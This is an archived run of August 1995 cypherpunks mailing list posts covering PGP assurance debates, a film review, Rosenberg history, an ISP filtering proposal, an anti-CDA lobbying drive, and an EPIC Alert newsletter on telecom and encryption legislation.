~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 2 Aug 1995, Kragen J Sittler wrote:

> On Mon, 31 Jul 1995, SysAdmin wrote:
> 
> > ObCypherpunk: Anybody heard from Detweiller?

Actually, he was at the last Bay Area Cypherpunks physical 
meeting under another name.  At least he learned that Eric Hughes 
and I are not the same person.  Unfortunately, Tim May was not in
attendance so no telling what he thinks.  

In addition, he has been fairly active on list of late.  I think
you all know which poster is he.

Hell, I don't care, just as long as he isn't frothing.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Tue, 1 Aug 95 19:55:53 PDT
To: cypherpunks@toad.com
Subject: Provably Correct Crypto?
Message-ID: <199508020255.OAA10557@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am Dr. Frederick B. Cohen and I say ...
> > I don't accept the ability to compile it myself as evidence and I
> > don't accept a summary of that source written in english prose
> 
> The reason to believe that thttpd fulfills the claims it makes is
> provided in some detail in the white paper on our server (see what's new
> under http://XXX.XXX).  A slightly more detailed version has been
> submitted for a journal article, and hopefully will appear in a year or
> two.
> 
>    [ A ton of crap which was exactly what I said I didn't want ]

I stipulated I didn't want any such garbage, I specifically said
english summaries are not acceptable and you bombard me with them.
Yet you won't accept others' opinion of PGP's security, which verbal or
otherwise, can only be an abstract summary.

> > You state that crypto should be proved correct and suggest a technique
> > otherwise known as formal specification.  I agree, pgp should have
> > been written in Z-specs.  If you take a course in formal specification
> > you will soon see the intractability of the technique wrt large
> > systems.
> 
> I didn't say that.  Perhaps you should review what I said before
> characterizing it.

piffle! Your words:
	"I think that this issue can generally be addressed by a divide
	and conquer strategy.  Prove that the called routines are
	correct and confined under all possible parameters, do the
	same for the calling routines, do the same for the interaction
	between them, and I think you have it."

This sounds like performing a formal analysis to me.  And you didn't
address the intractability anyway.

> I have shown (not yet proven) certain things.  A graduate student is now
> working on trying to prove the various properties I believe to be of
> interest in an automatic theorem prover he is working on.

The work in automatic theorem proving is ongoing and not limited to
your grad student or your work.

> I believe that these things are worth showing (and proving), but you
> may certainly feel free to disagree with these contentions.

I said showing by english isn't good enough, proving would be
fantastic.  I don't believe these issues reside solely with pgp and as
such you should question computability as a whole before using
"incomplete specification" in accusing one system to be flawed.
 
> > If you want people on this list to repeat after you "I cannot be
> > certain there are no compromising bugs or backdoors in X" Then I will
> > go out on a limb and say everyone here will agree if system X is
> > sufficiently large.
> 
> I don't believe I ever asked anyone on this list to repeat anything. 
> All I did was ask questions and respond to responses to my questions.

Your tiresome repetitive question was "Why do you believe X is secure"
I hereby answer exactly as above "I cannot be certain there are no
compromising bugs or backdoors in X"

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
         __________
       .- __   / -- -\  __   .  .  .           0
      / <___> ___  |  =8'                    //\/  
    .^| _---_ /   \ =   / \                 \/\
    |o |  =  / o | |   ||  |              ... /
    =0=======0==|  |----|  |=    Another drive by shooting on
     \_\_/    \_\_/   \_\_/         the information super highway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 2 Aug 95 14:56:54 PDT
To: cypherpunks@toad.com
Subject: "The Net"
Message-ID: <ac45406918021004a6b0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I saw "The Net" yesterday and was moderately entertained. Lots of leaps of
logic, especially the notion that one can be "vanished" by having computer
records changed--I can believe that such changes would screw things up, but
surely even the character played by Sandra Bullock (nicely) would have
human friends and associates to vouch for her.

The portrayal of her job as a "beta tester," with a couple of Mac screens
running and lots of MacTCP connections, was well done. In fact, maybe the
most interesting look at computer screens I've seen. (But maybe I'm
biased...)

The cheesy climax, involving a computer virus, was especially egregious.
But tension has to be gotten somehow, I suppose, and most moviegoers will
not be terribly excited by the "real stuff." All in all, some good tension.

If this was the film I advised a woman screenwriter/researcher about (the
"vanishing" part she was asking me for tips on, 18 months ago), I sure
couldn't see any influence of my ideas, or those of Cypherpunks. (I have
her name written down somewhere, but the two official screenwriters were
both male...still, I have a hunch she was doing background research for
them.)

Ironically, I saw a second movie the same day..."Under Siege II." It had a
lot of crypto, as well. Things like "Going secure" on cellphone
conversations with the Arabs purchasing the terrorist actions.


--The Praetorian
                                                           ----
                                                          | PI |
                                                           ----

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 2 Aug 95 23:33:55 PDT
To: hoz@univel.telescan.com
Subject: Re: Sat phone permit "wire"taps
In-Reply-To: <9507310754.AA17446@toad.com>
Message-ID: <eQ08myczByNO075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9507310754.AA17446@toad.com>,
hoz@univel.telescan.com (rick hoselton) wrote:

[ Somebody else wrote ]

> >The most current information on the Rosenbergs, gotten from decrypted Soviet
> >communications and declassified US and ex-Soviet files, indicates that Ethel
> >Rosenberg
> >was probably innocent of spying, and Julius was spying but didn't give away
> >any useful atomic secrets, and that the FBI probably knew at the time they
> >had Ethel killed that she was innocent.  
> 
> WOW!  Had them killed?  They WERE tried and convicted, you know.  Are you 
> claiming evidence was manufactured?  I heard David Kahn on CSPAN say that 
> at least one message mentions Ethel Rosenberg.  If memory serves, he said 
> something like "without going in to whether evidence was sufficient to 
> convict, and without going in to whether they should have been executed, 
> these transcripts show that they were spying for the Soviets"  
> (I'm not sure that's accurate enough for quotation marks, but that's the 
> basics of what he said.  I have it on VCR.)
> 
> Do you have additional information?  I'll agree the FBI hasn't always behaved 
> honorably, and maybe they aren't entitled to the benefit of the doubt here.

This is old news.  Julius spied, but didn't provide any useful
information. The FBI framed Ethel to try to get Julius to cop a plea
("Sing, or we fry her!")  Julius stuck to his principles, and both Ethel
and Julius were convicted in a rigged trial with a trained seal of J.
Edgar Hoover's as judge.

The Soviets had quality knowledge about the atomic bomb well before
Julius Rosenberg was in a position to pass any information along.  Klaus
Fuchs, the German refugee scientist who was a self-acknowledged
Communist from day one, was in on the most important atomic secret, that
a U235 bomb was practical, from the earliest days of the MAUD Committee,
the wartime British group of physicists that performed the first
calculations and that was the seed of talent around which the Americans'
Manhattan Project coalesced.


   Alan Bostick             | "Oh.  You come to Heaven without a fortune?"
Seeking opportunity to      | "Yes."
develop multimedia content. | "Unfortunate."
Finger abostick@netcom.com  |      Roger Zelazny, LORD OF LIGHT
for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBMCAM4eVevBgtmhnpAQHuNAL+OPVd24WG+Ev4KwwSAPc6h5VDrUlasHxt
hHLpz4Rjajt1Zbp8nSFM+jnemnjLKfbFCZZ6FLzXR4aXn/dM0z0C//wFanDD5+Dv
URGqxo+IJ+KTwiOqIAEx0+lVChaeDq8c
=2xoq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kragen J Sittler <xentrac@unm.edu>
Date: Wed, 2 Aug 95 16:36:18 PDT
To: Nathan Zook <nzook@bga.com>
Subject: Re: LD was Re: [NOISE] was Re: a hole in PGP
In-Reply-To: <Pine.3.89.9508021848.B3366-0100000@maria.bga.com>
Message-ID: <Pine.A32.3.91.950802163359.44927G-100000@pegasus.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Nathan Zook wrote:

> 
> 
> On Wed, 2 Aug 1995, Kragen J Sittler wrote:
> > doesn't recognize me, as his last (previous) words to me were 'just shut 
> > up, you writhing tentacle'.  Perhaps he's not so upset about things 
> > anymore; I don't know.
> 
> Kragen!  I haven't heard much from you since someone thought Kragen <-> 
> Kracken ==> monster ---> tentacle!  (And you were being pretty rational 
> at the time--for this list.)
> 
> Doing well, I hope.

*laugh* yes, relatively.  Moved to another state and started working at 
an underclass job.

And I'm trying frantically to unsubscribe; I no longer have big quotas 
and procmail.  My mail is going to cybele.unm.edu, which has since been 
renamed; also, I lost my account there.

You were the Christian fundamentalist, right?

Peace,
Kragen

Kragen Sittler <xentrac@unm.edu> 2.0 GCS/J/M/P/O/U/! d? H+/--- s+: !g>+ p?(?+)
!au a17.72 w+ v+(?(*)) C++(++++) UU/A/I/S+/->++ P+>+++ LX>++ 3>++ E(++)>+++     N++ K++>+++++ W--- M+/->+++ V(-) -po+ Y++>+++ !5 j R(-) G''' tv b+>+++ !D          e(*) u** h-/--/! f/+/++ r++ n+ y? (as of 9 Aug 1994) Blessed Be
     Atheism & Sex FAQs at http://www.unm.edu/~xentrac/News/faq/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 2 Aug 95 16:29:21 PDT
To: Kragen J Sittler <xentrac@unm.edu>
Subject: Re: LD was Re: [NOISE] was Re: a hole in PGP
In-Reply-To: <Pine.A32.3.91.950802142803.44927A-100000@pegasus.unm.edu>
Message-ID: <Pine.3.89.9508021848.B3366-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 2 Aug 1995, Kragen J Sittler wrote:

> On Mon, 31 Jul 1995, SysAdmin wrote:
> 
> > ObCypherpunk: Anybody heard from Detweiller?
> 
> Yes, I saw a posting from him (ldetweil@somewhere) on Usenet; I replied 
> and said it was good to see him back.  He answered politely; perhaps he 
> doesn't recognize me, as his last (previous) words to me were 'just shut 
> up, you writhing tentacle'.  Perhaps he's not so upset about things 
> anymore; I don't know.
> 
> Peace,
> Kragen
> 

Kragen!  I haven't heard much from you since someone thought Kragen <-> 
Kracken ==> monster ---> tentacle!  (And you were being pretty rational 
at the time--for this list.)

Doing well, I hope.

Nathan

P.S.: It's good to see this thread moving to the S side of the SNR





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 2 Aug 95 16:43:14 PDT
To: Patrick May <pjm@ionia.engr.sgi.com>
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <199508021853.LAA10598@ionia.engr.sgi.com>
Message-ID: <Pine.3.89.9508021848.D3366-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 2 Aug 1995, Patrick May wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Nathan Zook writes:
> [ . . . ]
>  > NYET-- Non-Youths Exhibit Temperance.
>  >  
>  > This is a rising, legitimate concern among parents that their children
>  > have all-too-easy access to porn on the internet.  Last year, there
> [ . . . ]
>  >  
>  > But none of these proposals can ultimately succeed.  Here I restate my
>  > NYET proposal from last year for your consideration.  The system is of
>  > necessity ISP-based.  Home-based systems are subject to attacks at
>  > home.  Since many (most?) children are better with computers than
>  > their parents, these attacks can be expected to succeed.
> [ . . . ]
>  >
>  > The NYET-software runs as superuser on the ISP's machine.  All minor
>  > accounts have a corresponding configuration file sitting in their
>  > account owner's parent's directory, which is locked with read/write by
>  > owner only flags.  The correspondence between minor and parent
>  > accounts sits in a file owned by root and similarly locked.
>  >  
>  > The parent sets the configuration file to permit and deny access to
>  > various parts of the net.  Since it is unreasonable for the parent to
> [ . . . ]
> 
>      Your solution fails against your specified threat.  Children who
> are more software-proficient than their parents will, in many cases,
> be able to access their parents' accounts and modify the configuration
> file (or simply use the account to access the blocked areas).
> Ultimately, all such systems are "home-based" if any accounts used by
> members of the household have or can be granted access to the naughty
> bits (tip o' the hat to M. Python).

Unquestionably, it is not possible to block this hole entirely.  However, 
that does not mean that this proposal is not still superior, at least on 
two points.

First, by moving the monitoring software to the ISP, the installation & 
configuration becomes much easier and more secure for the parent.  The 
monitoring software itself becomes at least as difficult to hack as the 
rest of unix, and the "Hot Babes Watch" hacks at least are prevented.

Secondly, as we move to challenge-response systems, the ability of Jr. to 
forge parental access drops considerably.  The "Last access on" 
information could clue a parent in.  (Jr. could reset the clock before 
modifying programs at home.)


No one on this list is going to claim that a 17-year old who has been 
hacking since he was ten can be stopped.  That doesn't make these efforts 
doomed from the outset, however.  In particular, I want to avoid 
non-custom "solutions" for minors attempting access.


Nathan

>      While your proposal is obviously marketable, given the success of
> Prodigy and the prospects for SurfWatch, it does not appear to be
> inherently more secure than schemes that utilize subscriber software.
> 
> Regards,
> 
> Patrick May
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMB/Jqe5Yg08fDKehAQH16gQAp78uOJX02xNz7/5XYPBcaRZRC8pCWx6K
> oUdOxbGta/l1rKrRGWhJ7WLJy9iaopBcbr4YXNOMPL4Va91DEXkJ5rfJKXC+o7Mz
> jA0wBujVu0DK+S0C49Ah3OoXxX6H0SorbuscvDF2IIw9aGLSezD49H4/GgWvhklo
> Y1Gu5Tfok+Y=
> =FsYi
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Wed, 2 Aug 95 17:34:58 PDT
To: bdavis@thepoint.net
Subject: a hole in PGP{n@3
In-Reply-To: <Pine.D-G.3.91.950802020333.25124A-100000@dg.thepoint.net>
Message-ID: <199508030021.AA04754@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Wed, 2 Aug 1995 02:09:25 -0400 (EDT)
   From: Brian Davis <bdavis@thepoint.net>

   You forgot the NSA's most recent overt act in the PGP conspiracy:  it 
   gets PGP declared a munition, harassing PZ, gets lots of bad press, etc., 
   all in order to make Cypherpunks believe that there is no back door, when 
   there really  is!

   Shhhhhhhhh. Don't let on that you know.  Just go back to Rot-13 encoding.

You forgot to mention that although PGP is "provably" secure, that the
NSA engine for breaking it is a quantum computer built with "borrowed"
extraterrestrial technology.

   > DCF


   EBD

P.S.: The Truth Is Out There.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 2 Aug 95 16:27:19 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Lobbying? (fwd)
Message-ID: <Pine.ULT.3.91.950802191734.8933A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


I posted this idea of mine about a month ago, when toad was having 
problems bouncing mail and the router on my own system was going crazy; I 
thought it had gone up but I got absolutely _no_ response about it, 
either pro or con, so I thought maybe I'd better repost it just in case 
it's still bouncing around sura or something.  I'll probably get flamed 
for starting up an old thread again, but this isn't so much an invitation 
for discussion as it is a call to action.  I've updated it, since some 
things have changed since then.

-=Kathleen M. Ellis=-

---------- Forwarded message ----------
Date: Fri, 14 Jul 1995 04:11:23 -0400 (EDT)
From: K. M. Ellis <kelli@zeus.towson.edu>
To: "Timothy C. May" <tcmay@sensemedia.net>
Cc: pfarrell@netcom.com, jlasser@rwd.goucher.edu, cme@tis.com,
    cypherpunks@toad.com
Subject: Cypherpunks Lobbying?

On Thu, 13 Jul 1995, Timothy C. May wrote:

> 
> I'd hardly call my view "throwing in the towel." What I said clearly enough
> was that the Washingtonians can throw out repressive legislation much
> faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
> NRA, ACLU, etc., and _not_ the Cypherpunks, who have no lobbying activities
> to speak of.

I'm glad you brought this up, Tim, because Pat Farrell, Carl Ellison, and
I have been discussing the possibility of doing just that over the past
week or so.  The three of us, in addition to many others (we like to call
ourselves "The Mid-Atlantic Cypherpunks") are very near DC and thought we
might take advantage of this on behalf of others who don't have the luxury
of living near their legislators. 

Our idea (and it was originally limited to lobbying against the CDA, but
we can expand it now to lobby against that and S.974) was to have Cypherpunks
send letters (yes, authentic _snail mail_) to a Cypherpunk willing to go
deliver it in person, (namely me) and talk to whoever is there, be it the
congressperson or one of his/her aides.  The strategy of this action would
be to say,"hello, we represent <insert your organization here> and we
oppose <insert appropriate legislation title here> and we feel this way
because <insert very reasonable and diplomatic explanations in easy,
mono-syllabic words so that the congresscritter can understand here> and
here is a letter from one of your constituents who feels the same way we
do."  A simple lobby. 

I thought this might be beneficial to cypherpunks because it seems that a
lot of representatives are difficult to get in touch with, since not all
of them have e-mail addresses.  I think there is a certain advantage in
this kind of action from an educational standpoint, considering that the
House doesn't seem to have a strong backer for this bill like the Senate
did, and the many Congresscritters who know nothing about the net only
need someone to explain the consequences of such a bill to them. 
Furthermore, to those ignorant of the net and its ways, a printed out list
of names and e-mail addresses collected through the web is completely
foreign and perhaps intimidating to them, and therefore not all that
helpful to us, IMHO.  Hand-signed letters (or hand-written, if your
printing is more legible than mine) in good, old-fashioned envelopes is
just what critters of this sort need to see. 

If any US citizens here would like me (and hopefully some older, wiser 
cypherpunks willing to join me on this trip) to deliver a letter to their 
congressperson please send a letter to this address:

                          The Hon. Whoever
                        c/o Kathleen M. Ellis
                           TSU box 898
                        Towson State University
                         8000 York Road
                          Towson, MD  21204

On the envelope you must include:

	The name of the congressperson (if I have to open the letter to be able 
			to tell who it is meant for it'll lose some of its 
			authenticity)

	My full address (yes, all five lines of it, or I'll never get it)

	If you can get it, the office location of representative 
			(building name and room number) printed on the 
			back. If you can't find it don't 
			worry, I'll find it, but if you can provide it I'd 
			appreciate it.  You can get it at the URL below.

	A return address

	A postmark from your district

The letter must have:

	The specific bill you are against; its number, title, and sponsors 
			(the CDA is H.R.1004/S.652 sponsored by 
			Senator James Exon, from Nebraska)

	Possible alternatives (my suggestion is H.R. 1978, sponsored by 
			Cox and Wyden)

	A polite introduction, a concise body, and a gracious 
			conclusion :). 

	Your address and signature.

If you need more information for your letter, good URLs on the subject are:

http://www.cdt.org/cdw.html
http://www.cdt.org/petition.html
http://www.eff.org/pub/EFF/Issues/censorship/Exon_bill/
http://uvacs.cs.virginia.edu/~hwh6k/public/S314_stuff.html
http://www.phantom.com/~slowdog
http://www.panix.com/vtw/exon/

If you don't know who your representative is, try to find her/him through

http://www.house.gov

and look for a familiar looking name from your state.  Unfortunately 
there's no "point-and-click" US map to refer to to find out which 
district is yours, but you should be able to find out fairly easily by 
looking for familiar names.  If you really get stuck, try your local 
League of Women Voters.

The main thing is, I need these letters soon.  In order to have a shot at
getting to talk to anyone, I must make appointments with the offices of
the respective representatives.  The house is expected to vote on this
topic any day now; the clock's a-ticking.  I ask that all letters be sent
so that I can receive them by August 11, 1995.  I aim to raid congress on
Wednesday, August 16.  This date could be changed, depending on the definite
responses I get from people willing to help. 

I have lobbied before, and I'm up to the task, but it would be nice to
have some other politically-oriented cypherpunks along for, at the very
least, moral support.  Anybody interested, Please Please Please send me
some e-mail.  Carl or Pat might go, and if we get enough people to help we 
can split the workload among teams.

If anyone has comments/questions/suggestions, don't hesitate.  I'd
appreciate whatever isn't necessary to go up on the list to be sent to me
privately, so's I don't get into trouble for "inciting spam". 

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Wed, 2 Aug 95 17:10:32 PDT
To: "Interested People" <interest@epic.org>
Subject: EPIC Alert 2.08
Message-ID: <n1404728444.82181@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


     =============================================================
      
        @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
        @     @  @   @   @        @ @   @     @     @  @    @
        @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
        @     @      @   @       @   @  @     @     @  @    @
        @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

     =============================================================
     Volume 2.08                                    August 2, 1995
     -------------------------------------------------------------

                         Published by the
           Electronic Privacy Information Center (EPIC)
                          Washington, DC
                          info@epic.org
                       WWW http://epic.org


=======================================================================
Table of Contents
=======================================================================
  
 [1] Telecom Bill Update
 [2] New Bill Targets Crypto
 [3] 2600 FOIA Case on Appeal
 [4] National Security Surveillance Increases
 [5] New EPIC Reports Available
 [6] Upcoming Conferences and Events


=======================================================================
[1] Telecom Bill Reaches House Floor
=======================================================================

By the time you read this, the House of Representatives may or may not
have begun consideration of HR 1555, the so-called "telecommunications
reform" bill (the latest estimates are that consideration will begin
on the evening of August 2).  EPIC has joined with a coalition of
public interest organizations in calling for the defeat of this
legislation.  The coalition includes the Center for Media Education,
Computer Professionals for Social Responsibility, Consumer Federation
of America, Media Access Project, People for the American Way Action
Fund, and Taxpayer Assets Project/Consumer Project on Technology.  In
a joint statement issued on July 31, the coalition says of the
legislation:

     Specific provisions will directly affect the Internet.
     Users have been actively opposing one Senate provision
     to ban all "indecent" communications on computer networks.
     Given the overwhelming Senate support for that measure,
     there is substantial risk that any version of the
     telecommunications bill will contain content restrictions
     of some sort.

     Not only will any version of this legislation probably
     regulate content on the Internet, it will certainly
     eliminate many important economic safeguards against market
     power and abuse. The very competitive market that exists
     for Internet service providers should be emulated for phone
     and cable companies. Yet the legislation encourages greater
     monopoly control over all communications services.

Related developments:

* In a statement released on July 31, President Clinton announced his
intention to veto the current version of the telecommunications bill
pending in the House.  The White House statement noted that, "Instead
of promoting open access and diversity of content and viewpoints, [the
bill] would allow fewer people to control greater numbers of
television, radio and newspaper outlets in every community."

* The status of the "Communications Decency Act," which is included in
the telecommunications bill passed by the Senate, is unclear in the
House.  Although the so-called "Exon amendment" language is not
currently contained in the House legislation, it is anticipated that
advocates of Internet censorship will attempt to attach the CDA to the
telecom bill on the House floor.  For updated information, check the
Voters Telecommunications Watch (VTW) home page at
http://www.panix.com/vtw/exon/exon.html.

* The following materials are now available at the EPIC home page,
http://www.epic.org/telecom_bill/

     The full text of the public interest coalition statement,
     including an analysis of the legislation and Congressional
     contact information;

     The White House statement on the House legislation;

     The "managers' report" on the legislation, describing
     the current version of the bill;

     The latest version of the VTW alert on the Communications
     Decency Act Internet censorship provisions.


=======================================================================
[2] New Bill Would Outlaw Non-Escrowed Encryption
=======================================================================

On June 27, Sen. Charles Grassley (R-Iowa) introduced the
"Anti-Electronic Racketeering Act of 1995."  The legislation addresses
a broad array of Internet-related issues, including encryption.  Under
the heading of "Racketeering-related crimes involving computers," the
bill would, in effect, criminalize the distribution of all encryption
software over the Internet or other computer networks unless "the
software at issue used a universal decoding device or program that was
provided to the Department of Justice prior to the distribution."

Section 2(h)(1) of S.974 would amend Title 18 of the United States
Code to make it unlawful to:

     distribute computer software that encodes or encrypts
     electronic or digital communications to computer networks
     that the person distributing the software knows or
     reasonably should know, is accessible to foreign nationals
     and foreign governments, regardless of whether such software
     has been designated as nonexportable.

The legislation further provides that:

     [i]t shall be an affirmative defense to prosecution under
     this section that the software at issue used a universal
     decoding device or program that was provided to the
     Department of Justice prior to the distribution.

The legislation is plainly an attempt to mandate the result the
Administration sought to achieve with the failed Clipper Chip
initiative -- ensuring law enforcement access to *all* encrypted
communications through government-escrowed keys.  Requiring
"knowledge" of accessibility to foreign nationals or governments
provides no meaningful protection in a global communications
environment.  Such knowledge can easily be imputed to any person
making encryption software available on the Internet.

Criminalizing such distribution "regardless of whether such software
has been designated as nonexportable," would effectively outlaw the
dissemination of any encryption software that does not provide the
government with escrowed keys or some other backdoor.  As drafted, the
legislation would appear to prohibit the distribution of any program
that contains security features, including Netscape Navigator, various
digital cash applications and even PKZIP.

The Grassley bill was drafted with input from the Department of
Justice, suggesting that the Administration may be moving from the
initial "voluntary" Clipper approach toward mandatory restrictions on
the distribution and use of non-escrowed encryption.  Indeed, FBI
Director Louis Freeh has indicated on several occasions that domestic
uses of encryption will eventually be curtailed.  For instance, Freeh
said in Congressional testimony on May 11, 1995,

     ... we're in favor of strong encryption, robust encryption.
     The country needs it, industry needs it.  We just want to
     make sure we have a trap door and key under some judge's
     authority where we can get there if somebody is planning a
     crime.

The text of the "Anti-Electronic Racketeering Act" can be obtained at
http://www.epic.org/crypto/s974.txt.

EPIC will continue to monitor the progress of this legislation and
will be posting analyses of its other draconian provisions, including
those dealing with computer crime, distribution of copyrighted
material and searches and seizures of computer systems.


=======================================================================
[3] Appeals Court to Decide "2600" FOIA Case
=======================================================================

The wheels of justice turn slowly ...

In November 1992, a group of young people affiliated with the computer
magazine "2600" were confronted by mall security personnel, local
police officers and several unidentified individuals in the Pentagon
City shopping mall in Virginia.  The group members were ordered to
identify themselves and to submit to searches of their personal
property.  Their names were recorded and some of their property was
confiscated.

Computer Professionals for Social Responsibility (CPSR) filed suit in
federal court in early 1993 seeking the release of relevant Secret
Service records under the Freedom of Information Act.  The litigation
of the case is being handled by EPIC.

In July 1994, U.S. District Judge Louis Oberdorfer ordered the Secret
Service to release the vast majority of documents it maintains on the
incident. The government appealed that decision and the appeal is now
pending. In a recently filed brief, EPIC and CPSR argue that the
withheld documents demonstrate Secret Service misconduct and that the
FOIA exemptions cited by the agency do not apply.

The Pentagon City incident has been described as an example of
over-zealous law enforcement activities directed against so-called
computer "hackers."  The case raises significant issues of free speech
and assembly, privacy and government accountability.  Oral argument
before the U.S. Court of Appeals for the District of Columbia Circuit
is scheduled for September 14, 1995.  A copy of the CPSR/EPIC brief
can be found at:

      http://cpsr.org/cpsr/computer_crime/2600_brief_6_95.txt


=======================================================================
[4] Secret Court Surveillance Orders Increase, New Chief Judge Chosen
=======================================================================

According to Justice Department documents, orders for "national
security" electronic surveillance increased in 1994 over the previous
year.  576 orders for "national security" electronic surveillance were
approved in 1994, an increase of 65 orders over the previous year but
still lower than previous peak years of 1984 and 1991.

No requests for surveillance were denied or modified. Since its
inception in 1979, the Foreign Intelligence Surveillance Court (FISC)
has never turned down a request for an electronic surveillance order.

The secret court was created by the Foreign Intelligence Surveillance
Act of 1977.  Last year, the FISC's jurisdiction was expanded to
include authorizing physical searches of premises in "national
security" cases.

FISA Orders 1979-1994

1979 - 207    1980 - 322    1981 - 433    1982 - 475   
1983 - 549    1984 - 635    1985 - 587    1986 - 573   
1987 - 512    1988 - 534    1989 - 546    1990 - 595   
1991 - 593    1992 - 484    1993 - 509    1994 - 576

-------------

A new leader was recently named for the court.  U.S. District Court
Judge Royce C. Lamberth has been chosen to be the chief judge.
Lamberth replaces US District Court Judge Joyce Hens Green, whose term
expired earlier this year.  Members of the FISC are chosen by Chief
Justice William Rehnquist and serve seven year terms.

Lamberth was originally appointed to the U.S. District Court by
President Ronald Reagan in 1987.  Prior to his appointment, he was
Chief of the Civil Division of the U.S. Attorney's Office in
Washington, D.C. In 1993, he ruled against CPSR in its attempt to
obtain classified documents relating to the development of the Digital
Signature Standard.

Other court members are Wendell A. Miles, Western District of
Michigan; Ralph Thompson, Western District of Oklahoma; Charles
Schwartz, Eastern District of Louisiana; Earl H. Carroll, District of
Arizona; James C. Cacheris, Eastern District of Virginia; and John
Keenan, Southern District of New York.


=======================================================================
[5] Updated EPIC Reports Available
=======================================================================

EPIC has released updates of two of its reports:

EPIC Online Guide to Privacy Resources.  A comprehensive list of
privacy organizations, publications, newsgroups, mailing lists,
netsites and conferences related to privacy.  Updated August 1, 1995.
HTTP://www.epic.org/privacy/online_guide_faq.txt

Overview of 104th Congress - Electronic Privacy and Civil Liberties
Legislation.  A comprehensive listing of all legislation currently
pending in Congress that affects privacy and civil liberties.
Includes a brief overview, bill number, and status of each bill.
Updated August 1, 1995.
HTTP://www.epic.org/privacy/legislative_update.txt


=======================================================================
[6] Upcoming Privacy Related Conferences and Events
=======================================================================

DEF CON III. August 4-6, 1995. Las Vegas. Major hacker conference.
Contact: dtangent@defcon.org or http://dfw.net/~aleph1/defcon

Surveillance Expo '95. August 8-10. McLean, Virginia. Sponsored by
Ross Engineering. Contact Jim Ross. 703-318-8600.

Advanced Surveillance Technologies. Sept. 4, 1995. Copenhagen,
Denmark. Sponsored by Privacy International and EPIC. Contact
pi@privacy.org or HTTP://www.privacy.org/pi/conference/

17th International Conference of Data Protection and Privacy
Commissioners. September 6-8, 1995. Copenhagen, Denmark. Sponsored by
the Danish Data Protection Agency.  Contact Henrik Waaben, +45 33 14
38 44 (tel), +45 33 13 38 43 (fax).

InfoWarCon '95. September 7-8, 1995. Arlington, VA. Sponsored by NCSA
and OSS. Email: Winn@Infowar.Com.

"Managing the Privacy Revolution." Privacy & American Business. Oct.
31 - Nov. 1, 1995. Washington, DC.  Speakers include C.B. Rogers
(Equifax). Contact Alan Westin 201/996-1154.

11th Annual Computer Security Applications Conference: The conference
includes technical papers, panels, vendor presentations, and tutorials
that address the application of computer security and safety
technologies in the civil, defense, and commercial environments.
December 11-15, 1995, New Orleans, Louisiana. Contact Vince Reed at
(205)890-3323 or vreed@mitre.org.

1996 Computers, Freedom and Privacy Conference. March 27-30, 1996.
Cambridge MA. Sponsored by MIT.  Contact: cfp96-info@mit.edu or
http://web.mit.edu/cfp96.

               (Send calendar submissions to Alert@epic.org)


=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
